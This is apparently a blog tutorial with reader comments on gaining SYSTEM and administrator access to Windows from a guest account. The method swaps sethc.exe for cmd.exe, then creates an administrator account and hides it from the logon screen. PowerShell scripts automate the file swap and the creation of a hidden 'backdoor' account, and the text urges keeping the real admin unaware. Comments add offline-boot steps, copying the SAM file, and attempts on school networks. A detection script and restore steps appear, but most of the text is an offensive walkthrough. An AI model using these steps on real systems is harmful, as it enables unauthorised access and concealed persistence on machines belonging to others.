Gain admin access on a Windows system using your guest account

Hello All,

Ever wanted to get into a friend's system and read the files and folders you get "access denied" on, or to get into an administrator's account? Here is a method that abuses the way Windows launches the Sticky Keys helper: at the logon screen it runs whatever file is named sethc.exe, and it runs it as SYSTEM.

  1. Have you ever noticed that if you press the SHIFT key five or more times in a row, a pop-up window titled "Sticky Keys" appears? If it doesn't on your computer, the shortcut is probably turned off. To enable it, go to Control Panel -> Accessibility Options; on the Keyboard tab, under Sticky Keys, click Settings and enable the keyboard shortcut. You can do this from a Guest account.
  2. If the following two requirements are met on your system, you are set to get into the admin's account:
  • Pressing SHIFT five or more times brings up the Sticky Keys pop-up.
  • You can overwrite sethc.exe in the Windows System32 directory. A Guest account normally cannot write there (the folder is read-only for non-administrators), so in practice this step needs an account with write access to System32, or an offline boot from a live CD/USB that mounts the Windows volume. On Windows XP, Windows File Protection may also put the original sethc.exe back from the dllcache folder after you replace it.

Concept:
When you press the SHIFT key five or more times, Windows launches a program named "sethc.exe" (the Sticky Keys helper). You can verify this in Task Manager (don't close the pop-up window first). The file lives in C:\WINDOWS\system32, or the system32 folder of wherever Windows is installed.

The Vulnerability

  1. When SHIFT is pressed five or more times, Windows executes the file named
    "sethc.exe" in the system32 folder. It does not check that the file is
    actually the Sticky Keys program: whatever binary has that name gets run.
    While a user is logged on it runs with the privileges of the CURRENT
    USER; if you are logged on as Guest, Task Manager's Processes tab shows
    the process under the user name Guest.
  2. The shortcut also works after you log off, while the Windows logon screen
    is displayed. No user is logged on at that point, so Winlogon launches
    sethc.exe itself, and IT RUNS WITH SYSTEM PRIVILEGE.
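Before swapping the file it is worth knowing how an administrator can tell that it has been swapped, since the replacement leaves obvious traces. The check below is an added example and not part of the original post; it assumes a default install (%SystemRoot%\System32), Windows 7 or later (Get-FileHash needs PowerShell 4, and the TrustedInstaller ownership check does not apply to XP, where system files are owned by Administrators) and an elevated PowerShell prompt.

```powershell
# Added example, not from the original post: is the sethc.exe in System32 still
# the real Sticky Keys helper, or has it been swapped for cmd.exe as described?
# Assumes a default install (%SystemRoot%\System32), Windows 7 or later and an
# elevated PowerShell prompt.
$sys32 = Join-Path $env:SystemRoot 'System32'
$sethc = Join-Path $sys32 'sethc.exe'
$cmd   = Join-Path $sys32 'cmd.exe'

$findings = @()

# 1. A byte-for-byte copy of cmd.exe is exactly the swap this post describes.
$sethcHash = (Get-FileHash -Algorithm SHA256 -Path $sethc).Hash
$cmdHash   = (Get-FileHash -Algorithm SHA256 -Path $cmd).Hash
if ($sethcHash -eq $cmdHash) {
    $findings += "sethc.exe is a copy of cmd.exe (SHA256 $sethcHash)"
}

# 2. Renaming a file does not change its version resource: the genuine helper
#    reports OriginalFilename sethc.exe, a renamed cmd.exe reports Cmd.Exe.
$orig = (Get-Item -Path $sethc).VersionInfo.OriginalFilename
if ($orig -and $orig -notlike 'sethc*') {
    $findings += "sethc.exe version resource says OriginalFilename '$orig'"
}

# 3. Shipped System32 binaries are owned by TrustedInstaller. Overwriting one
#    needs takeown/icacls first, which usually leaves Administrators as owner.
$owner = (Get-Acl -Path $sethc).Owner
if ($owner -ne 'NT SERVICE\TrustedInstaller') {
    $findings += "sethc.exe is owned by '$owner', expected NT SERVICE\TrustedInstaller"
}

if ($findings) {
    $findings | ForEach-Object { Write-Warning $_ }
} else {
    Write-Output "sethc.exe looks untouched (SHA256 $sethcHash)"
}
```

The three checks are independent: an attacker who copies the file offline from a Linux boot never runs takeown, so the owner may still look right while the hash and version resource give the swap away.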

Exploitation
If you have followed this far, the exploitation is simple. We take cmd.exe, copy it to a folder other than system32 (you cannot rename it to sethc.exe while the real sethc.exe sits in the same folder), rename the copy to sethc.exe, go to the system32 folder and paste it there. Windows asks whether you want to replace the existing file; click Yes and you have replaced sethc.exe with your copy of cmd.exe. Now pressing SHIFT five or more times pops up a command prompt instead of the Sticky Keys dialog.
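The same swap as a script, with a backup so it can be undone. This is an added example and not code from the original post; it assumes a default install path, Windows 7 or later (where System32 files are owned by TrustedInstaller and have to be taken over before they can be overwritten), an elevated PowerShell prompt, and a backup file name that is my own choice. It does not help from a Guest account, which cannot write to System32 at all.

```powershell
# Added example, not from the original post: replace sethc.exe with a copy of
# cmd.exe, keeping a backup so the swap can be undone. Needs rights to write to
# System32, which a Guest account does not have: run it from an elevated prompt
# on Windows 7 or later. Paths assume a default install; the backup name is an
# arbitrary choice.
$sys32  = Join-Path $env:SystemRoot 'System32'
$sethc  = Join-Path $sys32 'sethc.exe'
$cmd    = Join-Path $sys32 'cmd.exe'
$backup = Join-Path $sys32 'sethc.exe.bak'

function Install-SethcShell {
    if (-not (Test-Path $backup)) {
        Copy-Item -Path $sethc -Destination $backup    # keep the real helper
    }
    # Take ownership and grant Administrators full control; without this even
    # an elevated Copy-Item fails with "access denied".
    takeown.exe /f $sethc | Out-Null
    icacls.exe $sethc /grant 'Administrators:F' | Out-Null
    Copy-Item -Path $cmd -Destination $sethc -Force
    # Verify: after the swap the two files are byte-identical.
    (Get-FileHash -Path $sethc).Hash -eq (Get-FileHash -Path $cmd).Hash
}

function Restore-Sethc {
    if (-not (Test-Path $backup)) { throw "no backup found at $backup" }
    Copy-Item -Path $backup -Destination $sethc -Force
    Remove-Item -Path $backup
    # Hand the file back to TrustedInstaller so it no longer stands out.
    icacls.exe $sethc /setowner 'NT SERVICE\TrustedInstaller' | Out-Null
    (Get-FileHash -Path $sethc).Hash -ne (Get-FileHash -Path $cmd).Hash
}

# Install-SethcShell   # returns True when sethc.exe is now a copy of cmd.exe
# Restore-Sethc        # returns True when the original helper is back
```

Restore-Sethc is the answer to "how do I put it back": copy the backup over sethc.exe and return ownership to TrustedInstaller. Without a backup, the original can be recovered with `sfc /scannow`, which restores protected system files from the component store.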


Finally

  1. Now log off or restart. When you reach the Windows logon screen, press
    the SHIFT key five or more times. A command prompt pops up with SYSTEM
    privilege.
  2. Enter the following commands (replace username with the account name you
    want):
  3. net user username /add
  4. net localgroup administrators username /add
  5. A new user called username with administrator privilege has now been
    added. (The second command is "net localgroup", not "net user
    localgroup"; the latter is a typo that net rejects and it adds nothing.)

And thats it, you have admin privilege of the system and you can do what ever you want to with it.

Hiding your fake admin profile
You surely don't want the real admin to notice you. Here is how to hide the account from the logon screen as well as from the User Accounts control panel:

  1. Open the Registry Editor (regedit) and go to this key:
  2. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
  3. Here create a new DWORD value, name it exactly the user name you created for your admin account, and leave its data as 0. (If the SpecialAccounts and UserList keys do not exist yet, create them.) A value of 0 hides the account; 1 shows it again.

That's it: you are now invisible but still an administrator on the system. The account keeps working, and the real admin no longer sees it in the places they would normally look.
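The account creation and the hiding step together, as typed at the SYSTEM prompt the swapped sethc.exe opens. This is an added example and not part of the original post: net.exe and reg.exe behave the same whether that prompt is cmd.exe or PowerShell, and the account name and password used here are placeholders.

```powershell
# Added example, not from the original post: what to type at the SYSTEM prompt
# that the swapped sethc.exe opens. net.exe and reg.exe behave the same whether
# the prompt is cmd.exe or PowerShell. The account name and password are
# placeholders; pick your own (net user prompts for confirmation if the
# password is longer than 14 characters).
$user = 'backdoor'
$pass = 'Sethc-Pw1!'

# Create the account and make it a local administrator. The group command is
# "net localgroup", not "net user localgroup".
net user $user $pass /add
net localgroup Administrators $user /add

# Hide it from the Welcome screen and the User Accounts control panel: a
# REG_DWORD named after the account with data 0 under SpecialAccounts\UserList.
# The key does not exist by default; reg add creates it.
$userList = 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
reg add $userList /v $user /t REG_DWORD /d 0 /f

# Check the result: the account exists, is in Administrators and is hidden.
net user $user | Select-String 'Local Group Memberships'
reg query $userList /v $user

# To undo:  reg delete $userList /v $user /f ; net user $user /delete
```

Hiding the account only removes it from the Welcome screen and the control panel; `net user` and `net localgroup Administrators` still list it, which is where an administrator looking for a rogue account should look.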



Last but not least (IMPORTANT)
Windows has two types of logon screen:

  1. The Welcome screen, where the accounts are listed with pictures.
  2. The classic logon prompt, where you type a user name and password.

A hidden account does not appear on the Welcome screen, so after making it you have to log in through the second type. If your logon screen is of type 1, press CTRL+ALT+DEL twice to get the classic prompt, then type the hidden account's name and password.

Thats it!!!

NOTE:
This works wherever you can replace sethc.exe. If you cannot write to system32, the offline route (boot a live CD or USB and replace the file on the mounted Windows volume) is the usual way around it. If you are a newbie, please do some googling first; I have written almost every detail.

Thanks for reading this far :) Make a comment if you liked this one.



  • MullahCrazedNiccuh

    Hey Akshay…hope this helps you..
    You can download this bootable ISO: http://www.pogostick.net/~pnh/ntpasswd/ (only 3 MB, zipped). Create a bootable USB drive (you can use Unetbootin or YUMI), boot via it and clear the administrator password from the computer you want to use, and abracadabra! No password needed to log in to admin. You can access anything you want.

  • Balu

    Yes, it is indeed wonderful.
    This is better than other windows password recovery tools.
    I was able to do it in the second go.
    Thanks

  • saurabh ahuja

    Hello sir,
    Sir, I have a problem copying the sethc.exe into system32. Please give me an answer as soon as possible.
    Thanks.

  • Mr.Singh

    The information provided by you is really interesting and new for me, but there is one problem that came in front of me when I tried to change the administrator password using a guest account. When I logged in using a guest account, the SYSTEM32 folder becomes read-only and Windows doesn't allow me to make any changes in the system32 folder, due to which I cannot replace the SETHC.EXE file.

    Please reply to me with the solution: what can I do to change the password of admin using a guest account, as the SYSTEM32 is read-only?

    Thanks in advance

  • et phone home

    This hack does not work for computers with high security. I tried every way to get the files into system32 but get access denied for copying, WTF. Apparently the admins know of this hack and have protected the computers; the sethc.exe does not even show up in system32, I had to search for it.

  • http://vscrapnetwork.co.cc Fallen Memories

    Hello, this hack is too old now and you should update it. Also, only a few systems would allow Guest accounts to overwrite system32 files...
    You can try this...

    1. Download Ubuntu or any Linux with a GUI (for noob purposes); Ubuntu 11.04 or 10.04 would do.
    2. Install it on a USB thumb drive using either Unetbootin or the universal installer from pendrivelinux.
    3. Boot from the USB drive.
    4. A window will ask you if you want to install Ubuntu or try it. Select "try it".
    5. Go to the Home folder.
    6. In the upper left side of the window you can see mounted drives; select the first drive in the list. Take note, it would have an icon of a hard drive.
    7. Double-click that.
    8. If you see a folder named Windows, that's the drive we want; if not, try the others in the list.
    9. In the drive we selected, go to Windows > System32.
    10. Now find CMD.exe, copy it and paste it on the desktop, and rename it SETHC.exe.
    11. Then drag the renamed CMD.exe from the desktop to the System32 folder. You will be asked if you want to overwrite the existing SETHC.exe; click Yes to confirm.
    12. Reboot. The hack is now possible.

    You can press the shift key 5 times to bring out the command prompt.

    (This is only possible if you successfully followed what I have said earlier. IT'S 100% WORKING, TRIED AND TESTED ON DIFFERENT SYSTEMS, INCLUDING NETWORKED COMPUTERS FROM COLLEGE UNIVERSITIES) ^_^ thankx

  • Omega.

    Hey all of you,
    First of all, the system file doesn't get replaced. Someone help me with that. @Abhinav, as you asked what message comes and to provide some info about that: it says access is denied, the file is being used by someone else. That's what comes. Please help me.
    Thanks.

  • Omega.

    Does anyone know how to store input in a bat or vbs file???

  • noob

    When I tried to copy the sethc.exe into system32 it said I needed the admin password, which is a real problem for me because I am only doing this because I changed my password a while ago and forgot what it was, so I need to use "net user administrator *" to change my password.

  • Anas Abdalla

    Thanks
    I've just done it using Mini Windows XP from Hiren's bootable CD to replace the sethc.exe file, and it works just fine.

  • johnny darwin

    Ahhhhhhhh

    Cooooooool.

    Worked like charm

    My son is so happy (and afraid also, as now he cannot hide his files, I will CRACK his admin password)

    WOW

    Thanks

  • dude

    How do you take it back to normal? Which files need to be deleted out of C:? Please respond soon, I really need to know.

  • Nice

    Thanks, nice stuff.

    I liked the phrase “Live as admin forever and keep screwing the real admin forever.”

  • prakash

    Just follow MullahCrazedNiccuh's idea of booting with Linux from USB and copy the SAM file (the file where Windows stores all users' passwords), located in windows\system32\config. Copy it, paste it anywhere, e.g. a pendrive. Open the SAM file after you reboot the computer; then you will find a long code, and you can google it to decode it into plain text....

  • http://hristu.net Bob Saget The Third

    Can’t drag the new “sethc.exe” file to System32 folder :(

    • Nice

      To my knowledge this will only work on a Windows XP system without service packs. Service packs cover up these holes in the operating system.

  • Quadri Imran

    Hey bro! What if I don't have a system32 folder, only a readable one? This trick won't work for me; please give something which will work for me!!!

  • Aniruddh Agarwal

    Worked like a charm with the Linux method! My little brother forgot the password of the only account of his PC, but fortunately he still had a guest account with which I activated Sticky Keys. The rest was done by Linux!

  • poopy head

    i tried but i cant copy into system32

  • Diell Morina

    Hey, everything's good, but I can't turn on the fuckin' sticky keys!! I can change it by Ease of Access nor by Narrator before logging in (when you have to choose which user you want to log in as). When I turn it on from Ease of Access it doesn't do anything, even though I press sticky keys like 1000000000 times. Also when I try to do it by the Ease of Access (narrator thingy) before logging in, it pops up a message "error starting sound agent. There may be no sounds for FilterKeys or StickyKeys", and doesn't let me press OK and change the password.

    Please help!

    • Prankster855

      It starts up, goto your task manager.

  • Demolition Man

    It's working with Win XP SP2 only.

    Do you have another way for Win 7, 8 or XP SP3?

    thanks alot

  • http://saff ibbi

    I’ve just done it on Win XP SP3, works like a charm, I’d blow the admin if he was in front of me at the time.

  • Exerver

    I tried this on my school network, sadly I can’t overwrite files in the system32. Any way to get passed this?

  • Josh

    It still asks me for admin privileges when I copy the sethc.exe (cmd.exe) file to system32. Please tell me if I did anything wrong, like skipped a step.

  • http://mkj.co.in MKJ

    People are more interested in such stuff than XMPP. heheh ;) :p

  • Verity

    Hey, I'm trying this because I forgot my admin password and my guest account doesn't let me download anything. I've done everything, but the last couple of steps aren't working. I've typed "net user username/add" and entered, and then "net user localgroup administrators username/add", but no new user has been added? :| help

    • Prankster855

      o:dp username (SPACE) /add DERP

  • midhun

    I had changed CMD into sethc.exe but I can't copy it again to my Windows system32 folder. What should I do?

  • Bob

    A few days ago, I met the headache of having forgotten my Windows login password. The login screen rejected my passwords. I was frustrated because there was very important data on my disk and I couldn't reinstall the OS. ............
    However, I fortunately got to know the PCUnlocker utility, which is a professional Windows password recovery tool for us to reset Windows passwords instantly with no data loss.

  • Jonathan Cauthorn

    Correction to this step:
    net user localgroup administrators username /add
    should remove the “user” and should read:
    net localgroup administrators username /add

    Simple typo.